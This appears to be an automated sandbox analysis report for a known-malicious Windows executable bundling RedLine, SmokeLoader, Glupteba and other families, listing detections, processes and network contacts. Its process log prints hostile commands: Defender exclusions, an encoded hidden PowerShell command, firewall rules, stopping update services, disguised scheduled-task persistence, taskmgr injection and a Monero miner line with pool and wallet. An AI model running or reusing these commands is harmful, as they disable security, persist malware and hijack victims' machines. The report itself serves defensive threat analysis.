Analysis Overview
SHA256
5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f
Threat Level: Known bad
The file NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe was found to be: Known bad.
Malicious Activity Summary
SectopRAT
Glupteba payload
RedLine
Detect Mystic stealer payload
ZGRat
RedLine payload
SmokeLoader
Mystic
Glupteba
Detect ZGRat V1
SectopRAT payload
Downloads MZ/PE file
Modifies Windows Firewall
Stops running service(s)
Executes dropped EXE
Checks computer location settings
UPX packed file
Adds Run key to start application
Suspicious use of SetThreadContext
Launches sc.exe
Unsigned PE
Program crash
Enumerates physical storage devices
Creates scheduled task(s)
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
Checks SCSI registry key(s)
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-11 10:28
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-11 10:28
Reported
2023-11-11 10:31
Platform
win10v2004-20231020-en
Max time kernel
46s
Max time network
136s
Command Line
Signatures
Detect Mystic stealer payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Mystic
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
ZGRat
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4C94.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4DFD.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1200 set thread context of 3436 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 444 set thread context of 1800 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe
"C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3436 -ip 3436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 192
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\is64.bat" "
C:\Users\Admin\AppData\Local\Temp\4C94.exe
C:\Users\Admin\AppData\Local\Temp\4C94.exe
C:\Users\Admin\AppData\Local\Temp\4DFD.exe
C:\Users\Admin\AppData\Local\Temp\4DFD.exe
C:\Users\Admin\AppData\Local\Temp\6697.exe
C:\Users\Admin\AppData\Local\Temp\6697.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\6ABE.exe
C:\Users\Admin\AppData\Local\Temp\6ABE.exe
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Users\Admin\AppData\Local\Temp\6FEF.exe
C:\Users\Admin\AppData\Local\Temp\6FEF.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\6ABE.exe
C:\Users\Admin\AppData\Local\Temp\6ABE.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcACoALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlAA==
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Roaming\Tags\Settings.exe
C:\Users\Admin\AppData\Roaming\Tags\Settings.exe
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Users\Admin\AppData\Local\Temp\29EA.exe
C:\Users\Admin\AppData\Local\Temp\29EA.exe
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
C:\Users\Admin\AppData\Local\Temp\6D0E.exe
C:\Users\Admin\AppData\Local\Temp\6D0E.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Users\Admin\AppData\Local\Temp\8DE5.exe
C:\Users\Admin\AppData\Local\Temp\8DE5.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o stratum+ssl://rx.unmineable.com:443 -u XMR:479zMaydapGMnV67s9w67R7MygH86ebCQiYFDtnpdfSwGyYbWnhGerbJCbk2i2WwZx9qCrpYQmzFTBsSsQddJRLpKhMj2AL.RIG_CPU -p Max1957 --algo rx/0 --cpu-max-threads-hint=50
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Users\Admin\AppData\Local\NextSink\tcihw\TypeId.exe
C:\Users\Admin\AppData\Local\NextSink\tcihw\TypeId.exe
C:\Users\Admin\AppData\Local\NextSink\tcihw\TypeId.exe
C:\Users\Admin\AppData\Local\NextSink\tcihw\TypeId.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 126.21.238.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | udp |
| RU | 5.42.92.51:19057 | tcp | |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| RU | 5.42.92.190:80 | 5.42.92.190 | tcp |
| US | 194.49.94.72:80 | tcp | |
| US | 8.8.8.8:53 | 190.92.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.178.238.8.in-addr.arpa | udp |
| RU | 5.42.92.51:19057 | tcp | |
| RU | 5.42.92.190:80 | 5.42.92.190 | tcp |
| NL | 194.169.175.118:80 | 194.169.175.118 | tcp |
| RU | 5.42.65.80:80 | 5.42.65.80 | tcp |
| US | 8.8.8.8:53 | 118.175.169.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.65.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.9.123.176.in-addr.arpa | udp |
| US | 194.49.94.11:80 | tcp | |
| MD | 176.123.9.142:37637 | tcp | |
| RU | 5.42.92.190:80 | 5.42.92.190 | tcp |
| IT | 185.196.9.161:80 | 185.196.9.161 | tcp |
| US | 8.8.8.8:53 | 161.9.196.185.in-addr.arpa | udp |
| RU | 5.42.92.190:80 | 5.42.92.190 | tcp |
| RU | 185.174.136.219:443 | tcp | |
| RU | 5.42.92.51:19057 | tcp | |
| IE | 52.111.236.23:443 | tcp | |
| US | 194.49.94.11:80 | tcp | |
